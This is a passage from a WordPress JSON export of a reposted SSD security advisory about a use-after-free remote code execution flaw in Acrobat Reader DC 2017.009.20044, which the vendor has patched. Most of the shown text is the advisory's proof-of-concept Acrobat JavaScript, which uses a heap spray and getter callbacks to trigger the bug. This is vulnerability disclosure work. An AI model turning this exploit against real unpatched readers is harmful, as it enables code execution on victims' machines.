class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-20\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p4<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p4<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-21\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">eval<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;unescape(&#8216;%u&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p3<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">p4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;%u&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">p2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8216;)&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-22\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-23\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-24\"><span class=\"crayon-v\">basestring<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">unescape<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ptr2str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0xdeadc0de<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x18<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-25\"><span class=\"crayon-st\">while<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">basestring<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">basestring<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">unescape<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;%ueeee&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-26\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-27\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">allocs<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">count<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">basestring<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-28\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-29\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">arr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-30\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">count<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">push<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">basestring<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">substr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toUpperCase<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-31\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-32\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-33\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-34\"><span class=\"crayon-v\">globarr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-35\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-36\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">somefunc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-37\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-38\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">obj1_read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-39\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-40\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[obj1_read], get read property&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-41\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">globarr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">push<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">allocs<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x200<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x88<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">basestring<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-42\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">undefined<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-43\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-44\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-45\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">obj1_write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-46\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-47\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[obj1_write], get write property&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-48\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">somefunc<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-49\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-50\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-51\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">obj2_read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-52\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-53\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[obj2_read], get read property&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-54\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">undefined<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-55\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-56\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-57\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">obj2_write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-58\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-59\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[obj2_write], get write property&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-60\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">somefunc<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-61\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-62\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-63\"><span class=\"crayon-v\">obj1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Object<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-64\"><span class=\"crayon-v\">obj1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">__defineGetter__<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;read&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj1_read<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-65\"><span class=\"crayon-v\">obj1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">__defineGetter__<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;write&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj1_write<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-66\"><span class=\"crayon-v\">obj2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Object<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-67\"><span class=\"crayon-v\">obj2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">__defineGetter__<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;read&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj2_read<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-68\"><span class=\"crayon-v\">obj2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">__defineGetter__<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;write&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj2_write<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-69\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-70\"><span class=\"crayon-v\">app<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;crash @ 0xdeadc0de&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-71\"><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">addAnnot<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;name&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;rect&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj2<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;type&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Highlight&#8221;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-72\"><span class=\"crayon-v\">app<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;no crash!&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0074 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3361\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 09 Aug 2017 10:50:38 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a use after free vulnerability that leads to remote code execution found in Acrobat Reader DC version 2017.009.20044. Credit A security researcher from, Siberas, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program Vendor response The vendor has released patches to address this vulnerability. For more information: &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3361\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Acrobat Reader DC &#8211; Stream Object Remote Code Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11682,10757,13145],"class_list":["post-8663","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-use-after-free"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8663","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=8663"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8663\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=8663"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=8663"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=8663"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}